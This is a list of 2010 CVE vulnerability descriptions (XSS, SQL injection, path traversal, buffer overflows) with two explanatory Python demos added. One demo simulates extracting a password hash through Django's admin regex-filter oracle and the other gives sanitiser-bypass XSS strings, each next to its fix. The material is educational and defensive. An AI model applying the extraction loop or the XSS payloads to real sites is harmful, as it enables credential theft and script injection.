[CVE-2010-4794] Multiple cross-site scripting (XSS) vulnerabilities in the JoomlaSeller JS Calendar (com_jscalendar) component 1.5.1 and 1.5.4 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters in a jscalendar action to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-4792] Cross-site scripting (XSS) vulnerability in title.php in OPEN IT OverLook 5.0 allows remote attackers to inject arbitrary web script or HTML via the frame parameter.
[CVE-2010-4784] Multiple SQL injection vulnerabilities in member.php in PHP Web Scripts Easy Banner Free 2009.05.18, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
[CVE-2010-4783] Multiple cross-site scripting (XSS) vulnerabilities in index.php in PHP Web Scripts Easy Banner Free 2009.05.18, when magic_quotes_gpc is disabled, allow remote attackers to inject arbitrary web script or HTML via the (1) siteurl and (2) urlbanner parameters.
[CVE-2010-4782] Multiple SQL injection vulnerabilities in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 allow remote attackers to execute arbitrary SQL commands via the (1) city, (2) state, (3) country, (4) minprice, (5) maxprice, (6) bed, and (7) bath parameters, different vectors than CVE-2006-6807.
[CVE-2010-4779] Cross-site scripting (XSS) vulnerability in lib/includes/auth.inc.php in the WPtouch plugin 1.9.19.4 and 1.9.20 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wptouch_settings parameter to include/adsense-new.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-4778] Multiple cross-site scripting (XSS) vulnerabilities in fetchmailprefs.php in Horde IMP before 4.3.8, and Horde Groupware Webmail Edition before 1.2.7, allow remote attackers to inject arbitrary web script or HTML via the (1) username (aka fmusername), (2) password (aka fmpassword), or (3) server (aka fmserver) field in a fetchmail_prefs_save action, related to the Fetchmail configuration, a different issue than CVE-2010-3695. NOTE: some of these details are obtained from third party information.
[CVE-2010-4772] Cross-site scripting (XSS) vulnerability in blocks/lang.php in S-CMS 2.5 allows remote attackers to inject arbitrary web script or HTML via the id parameter to viewforum.php.
[CVE-2010-4761] The customer-interface ticket-print dialog in Open Ticket Request System (OTRS) before 3.0.0-beta3 does not properly restrict customer-visible data, which allows remote authenticated users to obtain potentially sensitive information from the (1) responsible, (2) owner, (3) accounted time, (4) pending until, and (5) lock fields by reading this dialog.
[CVE-2010-4757] Cross-site scripting (XSS) vulnerability in submitnews.php in e107 before 0.7.23 allows remote attackers to inject arbitrary web script or HTML via the submitnews_title parameter, a different vector than CVE-2008-6208. NOTE: some of these details are obtained from third party information. NOTE: this might be the same as CVE-2009-4083.1 or CVE-2011-0457.
[CVE-2010-4753] Cross-site scripting (XSS) vulnerability in LightNEasy.php in LightNEasy 3.2.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter, which is not properly handled in a forced SQL error message.
[CVE-2010-4749] Multiple cross-site scripting (XSS) vulnerabilities in BLOG:CMS 4.2.1.e, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) body parameter to action.php and the (2) amount and (3) action parameters to admin/index.php.
[CVE-2010-4748] Cross-site scripting (XSS) vulnerability in pmwiki.php in PmWiki 2.2.20 allows remote attackers to inject arbitrary web script or HTML via the from parameter to Main/WikiSandbox. NOTE: some of these details are obtained from third party information.
[CVE-2010-4747] Cross-site scripting (XSS) vulnerability in wordpress-processing-embed/data/popup.php in the Processing Embed plugin 0.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pluginurl parameter.
[CVE-2010-4745] Cross-site scripting (XSS) vulnerability in nav.html in PHPXref before 0.7.1 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2010-4737] SQL injection vulnerability in resorts.asp in HotWebScripts HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PropResort parameter.
[CVE-2010-4734] Multiple cross-site scripting (XSS) vulnerabilities in the comment feature in Skeletonz CMS 1.0, when the Blog plugin is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Website, and (3) Email parameters. NOTE: some of these details are obtained from third party information.
[CVE-2010-4732] cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463.
[CVE-2010-4731] Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a full pathname in the file parameter, a different vulnerability than CVE-2009-4463.
[CVE-2010-4730] Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463.
[CVE-2010-4718] Multiple cross-site scripting (XSS) vulnerabilities in the Lyftenbloggie (com_lyftenbloggie) component 1.1.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) tag and (2) category parameters to index.php.
[CVE-2010-4716] Cross-site scripting (XSS) vulnerability in the WebPublisher component in Novell GroupWise before 8.02HP allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4715] Multiple directory traversal vulnerabilities in the (1) WebAccess Agent and (2) Document Viewer Agent components in Novell GroupWise before 8.02HP allow remote attackers to read arbitrary files via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2010-4714] Multiple stack-based buffer overflows in Novell GroupWise before 8.02HP allow remote attackers to execute arbitrary code via a long HTTP Host header to (1) gwpoa.exe in the Post Office Agent, (2) gwmta.exe in the Message Transfer Agent, (3) gwia.exe in the Internet Agent, (4) the WebAccess Agent, or (5) the Monitor Agent.
[CVE-2010-4710] Cross-site scripting (XSS) vulnerability in the addItem method in the Menu widget in YUI before 2.9.0 allows remote attackers to inject arbitrary web script or HTML via a field that is added to a menu, related to documentation that specifies this field as a text field rather than an HTML field, a similar issue to CVE-2010-4569 and CVE-2010-4570.
[CVE-2010-4703] SQL injection vulnerability in default.asp in HotWebScripts HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PageId parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-4693] Multiple cross-site scripting (XSS) vulnerabilities in Coppermine Photo Gallery 1.5.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) h and (2) t parameters to help.php, or (3) picfile_XXX parameter to searchnew.php.
[CVE-2010-4690] The Mobile User Security (MUS) service on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.3(2) does not properly authenticate HTTP requests from a Web Security appliance (WSA), which might allow remote attackers to obtain sensitive information via a HEAD request, aka Bug ID CSCte53635.
[CVE-2010-4680] The WebVPN implementation on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) permits the viewing of CIFS shares even when CIFS file browsing has been disabled, which allows remote authenticated users to bypass intended access restrictions via CIFS requests, aka Bug ID CSCsz80777.
[CVE-2010-4677] emWEB on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) allows remote attackers to cause a denial of service (daemon crash) via a request for a document whose name contains space characters, aka Bug ID CSCsy08416.
[CVE-2010-4675] Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) do not properly determine the interfaces for which TELNET connections should be permitted, which allows remote authenticated users to bypass intended access restrictions via vectors involving the "lowest security level interface," aka Bug ID CSCsv40504.
[CVE-2010-4667] Cross-site scripting (XSS) vulnerability in Coppermine Photo Gallery (CPG) before 1.4.27 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4647] Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE before 3.6.2 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) help/index.jsp or (2) help/advanced/content.jsp.
[CVE-2010-4646] Cross-site scripting (XSS) vulnerability in Hastymail2 before 1.01 allows remote attackers to inject arbitrary web script or HTML via a crafted background attribute within a cell in a TABLE element, related to improper use of the htmLawed filter.
[CVE-2010-4642] Cross-site scripting (XSS) vulnerability in XWiki Enterprise before 2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4640] Multiple cross-site scripting (XSS) vulnerabilities in XWiki Watch 1.0 allow remote attackers to inject arbitrary web script or HTML via the rev parameter to (1) bin/viewrev/Main/WebHome and (2) bin/view/Blog, and the (3) register_first_name and (4) register_last_name parameters to bin/register/XWiki/Register. NOTE: the provenance of this information is unknown.
[CVE-2010-4637] Cross-site scripting (XSS) vulnerability in feedlist/handler_image.php in the FeedList plugin 2.61.01 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
[CVE-2010-4631] Multiple cross-site scripting (XSS) vulnerabilities in ASPilot Pilot Cart 7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) countrycode parameter to contact.asp, USERNAME parameter to (2) gateway.asp and (3) cart.asp, and the specific parameter to (4) quote.asp and (5) buyitnow.
[CVE-2010-4630] Cross-site scripting (XSS) vulnerability in pages/admin/surveys/create.php in the WP Survey And Quiz Tool plugin 1.2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2010-4623] WebSEAL in IBM Tivoli Access Manager for e-business 6.1.1 before 6.1.1-TIV-AWS-FP0001 allows remote authenticated users to cause a denial of service (worker thread consumption) via shift-reload actions.
[CVE-2010-4622] Directory traversal vulnerability in WebSEAL in IBM Tivoli Access Manager for e-business 6.1.1 before 6.1.1-TIV-AWS-FP0001 on AIX allows remote attackers to read arbitrary files via a %uff0e%uff0e (encoded dot dot) in a URI.
[CVE-2010-4618] Cross-site scripting (XSS) vulnerability in the Algis Info aiContactSafe component before 2.0.14 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4616] Cross-site scripting (XSS) vulnerability in modules/content/admin/content.php in ImpressCMS 1.2.3 Final, and possibly other versions before 1.2.4, allows remote attackers to inject arbitrary web script or HTML via the quicksearch_ContentContent parameter.
[CVE-2010-4610] Cross-site scripting (XSS) vulnerability in index.php in Html-edit CMS 3.1.8 allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2010-4607] Multiple cross-site scripting (XSS) vulnerabilities in Habari 0.6.5, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) additem_form parameter to system/admin/dash_additem.php and the (2) status_data[] parameter to system/admin/dash_status.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-4602] The Web client in IBM Rational ClearQuest 7.1.1.x before 7.1.1.4 and 7.1.2.x before 7.1.2.1 allows remote authenticated users to bypass "restricted user" limitations, and read arbitrary records, via a modified record number in the URL for a RECORD action, as demonstrated by a modified bookmark.
[CVE-2010-4600] Dojo Toolkit, as used in the Web client in IBM Rational ClearQuest 7.1.1.x before 7.1.1.4 and 7.1.2.x before 7.1.2.1, allows remote attackers to read cookies by navigating to a Dojo file, related to an "open direct" issue.
[CVE-2010-4597] Stack-based buffer overflow in the save method in the IntegraXor.Project ActiveX control in igcomm.dll in Ecava IntegraXor Human-Machine Interface (HMI) before 3.5.3900.10 allows remote attackers to execute arbitrary code via a long string in the second argument.
[CVE-2010-4590] Cross-site scripting (XSS) vulnerability in HTTP Access Services (HTTP-AS) in the Connection Manager in IBM Lotus Mobile Connect (LMC) before 6.1.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4589] Cross-site scripting (XSS) vulnerability in IBM ENOVIA 6 allows remote attackers to inject arbitrary web script or HTML via vectors related to the emxFramework.FilterParameterPattern property.
[CVE-2010-4586] The default configuration of Opera before 11.00 enables WebSockets functionality, which has unspecified impact and remote attack vectors, possibly a related issue to CVE-2010-4508.
[CVE-2010-4584] Opera before 11.00, when Opera Turbo is used, does not properly present information about problematic X.509 certificates on https web sites, which might make it easier for remote attackers to spoof trusted content via a crafted web site.
[CVE-2010-4583] Opera before 11.00, when Opera Turbo is enabled, does not display a page's security indication, which makes it easier for remote attackers to spoof trusted content via a crafted web site.
[CVE-2010-4580] Opera before 11.00 does not clear WAP WML form fields after manual navigation to a new web site, which allows remote attackers to obtain sensitive information via an input field that has the same name as an input field on a previously visited web site.
[CVE-2010-4579] Opera before 11.00 does not properly constrain dialogs to appear on top of rendered documents, which makes it easier for remote attackers to trick users into interacting with a crafted web site that spoofs the (1) security information dialog or (2) download dialog.
[CVE-2010-4577] The CSSParser::parseFontFaceSrc function in WebCore/css/CSSParser.cpp in WebKit, as used in Google Chrome before 8.0.552.224, Chrome OS before 8.0.552.343, webkitgtk before 1.2.6, and other products does not properly parse Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted local font, related to "Type Confusion."
[CVE-2010-4576] browser/worker_host/message_port_dispatcher.cc in Google Chrome before 8.0.552.224 and Chrome OS before 8.0.552.343 does not properly handle certain postMessage calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code that creates a web worker.
[CVE-2010-4570] Cross-site scripting (XSS) vulnerability in the duplicate-detection functionality in Bugzilla 3.7.1, 3.7.2, 3.7.3, and 4.0rc1 allows remote attackers to inject arbitrary web script or HTML via the summary field, related to the DataTable widget in YUI.
[CVE-2010-4569] Cross-site scripting (XSS) vulnerability in Bugzilla 3.7.1, 3.7.2, 3.7.3, and 4.0rc1 allows remote attackers to inject arbitrary web script or HTML via the real name field of a user account, related to the AutoComplete widget in YUI.
[CVE-2010-4566] The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.
[CVE-2010-4555] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.21 and earlier allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) drop-down selection lists, (2) the > (greater than) character in the SquirrelSpell spellchecking plugin, and (3) errors associated with the Index Order (aka options_order) page.
[CVE-2010-4554] functions/page_header.php in SquirrelMail 1.4.21 and earlier does not prevent page rendering inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.
[CVE-2010-4544] Cross-site scripting (XSS) vulnerability in the servlet in IBM Lotus Notes Traveler before 8.5.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4536] Multiple cross-site scripting (XSS) vulnerabilities in KSES, as used in WordPress before 3.0.4, allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the & (ampersand) character, (2) the case of an attribute name, (3) a padded entity, and (4) an entity that is not in normalized form.
[CVE-2010-4534] The administrative interface in django.contrib.admin in Django before 1.1.3, 1.2.x before 1.2.4, and 1.3.x before 1.3 beta 1 does not properly restrict use of the query string to perform certain object filtering, which allows remote authenticated users to obtain sensitive information via a series of requests containing regular expressions, as demonstrated by a created_by__password__regex parameter.
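The Django entry describes an information-disclosure oracle: the changelist applies whatever field path the query string names, so a relation-spanning regex lookup such as created_by__password__regex lets an authenticated admin user test a stored hash one character at a time. The Python below is an added simulation, not Django's code: an in-memory model with constructed sample data, a changelist that honours arbitrary lookups, the extraction loop, and a simplified allowlist check in the spirit of the fix (the real project's logic is more involved and is assumed, not quoted, here).

```python
import re
import string
from dataclasses import dataclass


@dataclass
class User:
    username: str
    password: str        # the stored password hash


@dataclass
class Ticket:
    title: str
    created_by: User


# Constructed sample data (not from any real site); hash shortened for the demo.
ADMIN = User("alice", "sha1$3f9a$0c7b2e")
TICKETS = [Ticket("login broken", ADMIN), Ticket("typo on homepage", ADMIN)]

LOOKUP_TYPES = {"exact", "iexact", "contains", "icontains", "startswith",
                "regex", "iregex", "in", "gt", "lt", "isnull"}
LIST_FILTER = ("created_by",)    # the only relation this admin page declares


def resolve(obj, path: str):
    """Follow a__b__c through attributes, the way a query path is walked."""
    for attr in path.split("__"):
        obj = getattr(obj, attr)
    return obj


def changelist(query: dict) -> list:
    """Vulnerable: applies any ?path__lookup=value filter it is given.
    Only the regex lookup is implemented, which is all the oracle needs."""
    for lookup, value in query.items():
        path, _, lookup_type = lookup.rpartition("__")
        if lookup_type != "regex":
            raise NotImplementedError("demo supports only __regex")
        return [t for t in TICKETS if re.search(value, resolve(t, path))]
    return list(TICKETS)


def lookup_allowed(lookup: str) -> bool:
    """Hardened rule (simplified, assumed): a lookup that crosses a relation
    is only honoured when that exact path is declared in LIST_FILTER."""
    path, _, lookup_type = lookup.rpartition("__")
    if lookup_type not in LOOKUP_TYPES:   # no lookup suffix, whole thing is the path
        path = lookup
    return "__" not in path or path in LIST_FILTER


def changelist_hardened(query: dict) -> list:
    for lookup in query:
        if not lookup_allowed(lookup):
            raise PermissionError(f"lookup {lookup!r} not allowed")
    return changelist(query)


def extract_hash(max_len: int = 40) -> str:
    """Regex oracle against the vulnerable changelist: extend the known prefix
    one character per round; the server only answers 'rows' or 'no rows'."""
    alphabet = string.ascii_lowercase + string.digits + "$"
    prefix = ""
    for _ in range(max_len):
        for c in alphabet:
            pattern = "^" + re.escape(prefix + c)
            if changelist({"created_by__password__regex": pattern}):
                prefix += c
                break
        else:
            return prefix          # nothing extends the prefix: end of string
    return prefix


if __name__ == "__main__":
    print("recovered:", extract_hash())
    print("allowed?  ", lookup_allowed("created_by__password__regex"))
```

The cost of the attack is linear in alphabet size times hash length, one request per guess, which is why "remote authenticated users" with only restricted admin access is enough. The defensive rule is the same one for any filterable endpoint: the set of permitted field paths is fixed by the server, never derived from the request.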
[CVE-2010-4530] Signedness error in ccid_serial.c in libccid in the USB Chip/Smart Card Interface Devices (CCID) driver, as used in pcscd in PCSC-Lite 1.5.3 and possibly other products, allows physically proximate attackers to execute arbitrary code via a smart card with a crafted serial number that causes a negative value to be used in a memcpy operation, which triggers a buffer overflow. NOTE: some sources refer to this issue as an integer overflow.
[CVE-2010-4524] Cross-site scripting (XSS) vulnerability in lib/mhtxthtml.pl in MHonArc 2.6.16 allows remote attackers to inject arbitrary web script or HTML via a malformed start tag and end tag for a SCRIPT element, as demonstrated by <scr<body>ipt> and </scr<body>ipt> sequences.
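The MHonArc entry is the textbook single-pass sanitiser bypass: removing the inner tag from <scr<body>ipt> re-assembles a <script> tag that the filter has already walked past. The Python below is an added illustration, not MHonArc's code; it assumes a tiny blocklist of two tag names and shows the one-pass strip beside a strip that is repeated until the output stops changing.

```python
import re

# Constructed inputs; the <scr<body>ipt> sequence is the one named in the CVE.
SAMPLES = [
    "<script>alert(1)</script>",
    "<scr<body>ipt>alert(1)</scr<body>ipt>",
    "<scr<scr<body>ipt>ipt>alert(1)</script>",
    "plain text with a < b and c > d",
]

# A two-entry blocklist stands in for the sanitiser's real tag list (assumed).
_TAG_RE = re.compile(r"</?(?:script|body)\b[^>]*>", re.IGNORECASE)


def strip_once(html: str) -> str:
    """Single-pass strip. Deleting the inner <body> joins 'scr' and 'ipt>' into
    a <script> tag the scanner has already passed, so output is worse than input."""
    return _TAG_RE.sub("", html)


def strip_to_fixpoint(html: str, max_rounds: int = 20) -> str:
    """Re-run the strip until nothing changes; a tag re-assembled by round n is
    removed by round n+1. Fail closed if it does not converge."""
    for _ in range(max_rounds):
        cleaned = _TAG_RE.sub("", html)
        if cleaned == html:
            return cleaned
        html = cleaned
    raise ValueError("sanitiser did not converge")


def contains_script(html: str) -> bool:
    """Cheap post-condition used by the demo to judge the two strategies."""
    return re.search(r"<script\b", html, re.IGNORECASE) is not None


if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r}\n  once:     {strip_once(s)!r}"
              f"\n  fixpoint: {strip_to_fixpoint(s)!r}")
```

Iterating to a fixed point closes this particular hole, but a blocklist stripper remains fragile; the durable fix is to parse the input into a tree and emit only allowlisted elements and attributes, so that there is no string for a second pass to re-assemble.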
[CVE-2010-4522] Multiple cross-site scripting (XSS) vulnerabilities in MyBB (aka MyBulletinBoard) 1.4.14, and 1.6.x before 1.6.1, allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) editpost.php, (2) member.php, and (3) newreply.php.
[CVE-2010-4521] Cross-site scripting (XSS) vulnerability in the Views module 6.x before 6.x-2.12 for Drupal allows remote attackers to inject arbitrary web script or HTML via a page path.
[CVE-2010-4520] Multiple cross-site scripting (XSS) vulnerabilities in the Views module 6.x before 6.x-2.11 for Drupal allow remote attackers to inject arbitrary web script or HTML via (1) a URL or (2) an aggregator feed title.
[CVE-2010-4518] Cross-site scripting (XSS) vulnerability in wp-safe-search/wp-safe-search-jx.php in the Safe Search plugin 0.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the v1 parameter.
[CVE-2010-4516] Multiple cross-site scripting (XSS) vulnerabilities in the JXtended Comments component before 1.3.1 for Joomla allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4514] Cross-site scripting (XSS) vulnerability in Install/InstallWizard.aspx in DotNetNuke 5.05.01 and 5.06.00 allows remote attackers to inject arbitrary web script or HTML via the __VIEWSTATE parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-4513] Multiple cross-site scripting (XSS) vulnerabilities in Zimplit CMS 3.0, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter in a load action to zimplit.php and (2) client parameter to English_manual_version_2.php.
[CVE-2010-4508] The WebSockets implementation in Mozilla Firefox 4 through 4.0 Beta 7 does not properly perform proxy upgrade negotiation, which has unspecified impact and remote attack vectors, related to an "inherent problem" with the WebSocket specification.
[CVE-2010-4507] Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi.
[CVE-2010-4506] Passlogix v-GO Self-Service Password Reset (SSPR) and OEM before 7.0A allows physically proximate attackers to execute arbitrary programs without authentication by triggering use of an invalid SSL certificate and using the Internet Explorer interface to navigate through the filesystem via a "Save As" dialog that is reachable from the "Certificate Export" wizard.
[CVE-2010-4504] Multiple cross-site scripting (XSS) vulnerabilities in eSyndiCat Directory 2.3 allow remote attackers to inject arbitrary web script or HTML via the title parameter to (1) suggest-category.php and (2) suggest-listing.php.
[CVE-2010-4499] Session fixation vulnerability in Collaborative Information Manager server, as used in TIBCO Collaborative Information Manager before 8.1.0 and ActiveCatalog before 1.0.1, allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2010-4497] Cross-site scripting (XSS) vulnerability in Collaborative Information Manager server, as used in TIBCO Collaborative Information Manager before 8.1.0 and ActiveCatalog before 1.0.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4489] libvpx, as used in Google Chrome before 8.0.552.215 and possibly other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted WebM video. NOTE: this vulnerability exists because of a regression.
[CVE-2010-4485] Google Chrome before 8.0.552.215 does not properly restrict the generation of file dialogs, which allows remote attackers to cause a denial of service (reduced usability and possible application crash) via a crafted web site.
[CVE-2010-4483] Google Chrome before 8.0.552.215 does not properly restrict read access to videos derived from CANVAS elements, which allows remote attackers to bypass the Same Origin Policy and obtain potentially sensitive video data via a crafted web site.
[CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
[CVE-2010-4475] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment.
[CVE-2010-4471] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to 2D. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the exposure of system properties via vectors related to Font.createFont and exception text.
[CVE-2010-4469] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is heap corruption related to the Verifier and "backward jsrs."
[CVE-2010-4468] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to JDBC.
[CVE-2010-4467] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 10 through 6 Update 23 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
[CVE-2010-4465] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the lack of framework support by AWT event dispatch, and/or "clipboard access in Applets."
[CVE-2010-4464] Unspecified vulnerability in Oracle Sun Convergence 1.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail.
[CVE-2010-4463] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 21 through 6 Update 23 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
[CVE-2010-4456] Unspecified vulnerability in Oracle Sun Java System Communications Express 6.2 and 6.3 allows remote attackers to affect integrity via unknown vectors related to Web Mail.
[CVE-2010-4453] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 7.0.7, 8.1.6, 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect integrity via unknown vectors related to Servlet Container.
[CVE-2010-4452] Unspecified vulnerability in the Deployment component in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2010-4448] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Networking. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue involves "DNS cache poisoning by untrusted applets."
[CVE-2010-4447] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment.
[CVE-2010-4437] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet Container.
[CVE-2010-4436] Unspecified vulnerability in Oracle Sun Management Center (SunMC) 4.0 allows remote attackers to affect confidentiality via unknown vectors related to Web Console.
[CVE-2010-4429] Unspecified vulnerability in the Agile Core component in Oracle Supply Chain Products Suite 9.3.0.2 and 9.3.1 allows remote authenticated users to affect integrity via unknown vectors related to Web Client, a different vulnerability than CVE-2010-3505.
[CVE-2010-4427] Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.4.0, 10.1.3.4.1, and 11.1.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Web Server.
[CVE-2010-4425] Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.3.2, 10.1.3.4.0, and 10.1.3.4.1 allows remote authenticated users to affect integrity via unknown vectors related to Web Server.
[CVE-2010-4407] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AlGuest 1.1c-patched allow remote attackers to inject arbitrary web script or HTML via the (1) nome (nickname), (2) messaggio (message), and (3) link (homepage) parameters.
[CVE-2010-4405] Cross-site scripting (XSS) vulnerability in the Yannick Gaultier sh404SEF component before 2.1.8.777 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4402] Multiple cross-site scripting (XSS) vulnerabilities in wp-login.php in the Register Plus plugin 3.5.1 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) firstname, (2) lastname, (3) website, (4) aim, (5) yahoo, (6) jabber, (7) about, (8) pass1, and (9) pass2 parameters in a register action.
